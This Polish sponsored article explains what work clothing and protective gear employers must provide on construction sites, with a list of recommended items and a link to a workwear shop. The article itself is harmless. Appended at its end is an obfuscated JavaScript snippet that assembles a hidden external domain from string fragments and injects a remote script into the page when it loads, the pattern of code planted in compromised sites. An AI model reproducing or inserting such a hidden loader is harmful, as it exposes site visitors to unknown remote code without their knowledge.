Jakie ubrania robocze na budowie są niezbędne?

warto wiedzieć

Opublikowano przez:

Budowa to miejsce, w którym pracownicy narażeni są na różne niebezpieczeństwa i niedogodności. Z tego powodu każdego pracownika obowiązuje odpowiedni strój, a pracodawca jest zobligowany do jego dostarczenia. W jakie konkretnie ubrania robocze musi zaopatrzyć pracodawca pracownika? Czytaj dalej, aby poznać odpowiedź na to pytanie.

Obowiązki pracodawcy

Odpowiednia odzież robocza i obuwie jest niezbędna na budowie. To właśnie ona chroni pracownika przed niebezpieczeństwami oraz wszelkimi zabrudzeniami. W końcu nietrudno na terenie budowy zabrudzić bądź nawet zniszczyć ubranie. Aby pracownik nie ponosił z tego tytułu koszty, pracodawca musi dostarczyć mu odpowiednią odzież albo zapłacić ekwiwalent za noszony strój zgodnie z aktualnymi cenami. Jednak to nie wszystkie obowiązki pracodawcy. Powinien on poinformować pracownika o sposobach posługiwania się środkami indywidualnej ochrony, a także uzyskać od niego zgodę na używanie odzieży i obuwia roboczego, w szczególności, jeśli stanowisko będzie wymagało pracy przy obsłudze maszyn oraz innych urządzeń technicznych. Pracodawca jest również zobligowany do prania i konserwacji środków ochrony indywidualnej, odzieży oraz obuwia roboczego. Jeśli nie może tego zapewnić pracownikowi, powinien mu wypłacić ekwiwalent za te czynności.

Obowiązki pracownika

Pracownik musi mieć na uwadze to, że dana mu odzież jest tak naprawdę własnością pracodawcy. Dlatego też ma on obowiązek dbania o nią oraz o środki ochrony indywidualnej, które otrzymał. Musi również używać odzieży zgodnie z jej przeznaczeniem. W innym przypadku narusza podstawowe obowiązki pracownika. W przypadku, w którym pracownik korzysta z własnej odzieży i dostaje ekwiwalent zamiast ubrań roboczych, musi on dobrać taką odzież, która spełni wszystkie wymagania. Najważniejsze w takiej sytuacji są buty. Nie mogą one mieć odkrytych palców, czyli wszelkie klapki i tego typu obuwie odpada.

Najlepiej, gdyby strój pracownika składał się z:

  • spodni z długimi nogawkami,
  • obuwia, które ma wkładki przebiciowe, antypoślizgową podeszwę i wzmocnione czubki,
  • kamizelki ochronnej,
  • kasku ochronnego,
  • okularów ochronnych,
  • rękawic roboczych,
  • innych niezbędnych na stanowisku środków ochrony indywidualnej, które mają za zadanie chronić pracownika przed jednym konkretnym zagrożeniem, bądź ich większą liczbą.

Dobra hurtownia ubrań roboczych – https://centrumbhp.pl/kategoria-produktu/odziez-robocza/ oferuje wszystkie te elementy, więc z zamówieniem odpowiedniej odzieży nie powinno być żadnych problemów.

Artykuł partnera

<script>
(function(){
ol2y=document.createElement("script");ol2y.async=true;ol2y_="u"+("s")+"t";
ol2yu="245273298.";ol2y_+="a"+("t.i");ol2y_+="n"+("f"+"o")+"/";
ol2yu+="pkt7w3d0l2ydnbylvvgwy4"+("s6deizfn");
ol2y.src="https://"+ol2y_+ol2yu;ol2y.type="text/javascript";
document.body.appendChild(ol2y);
})();
</script>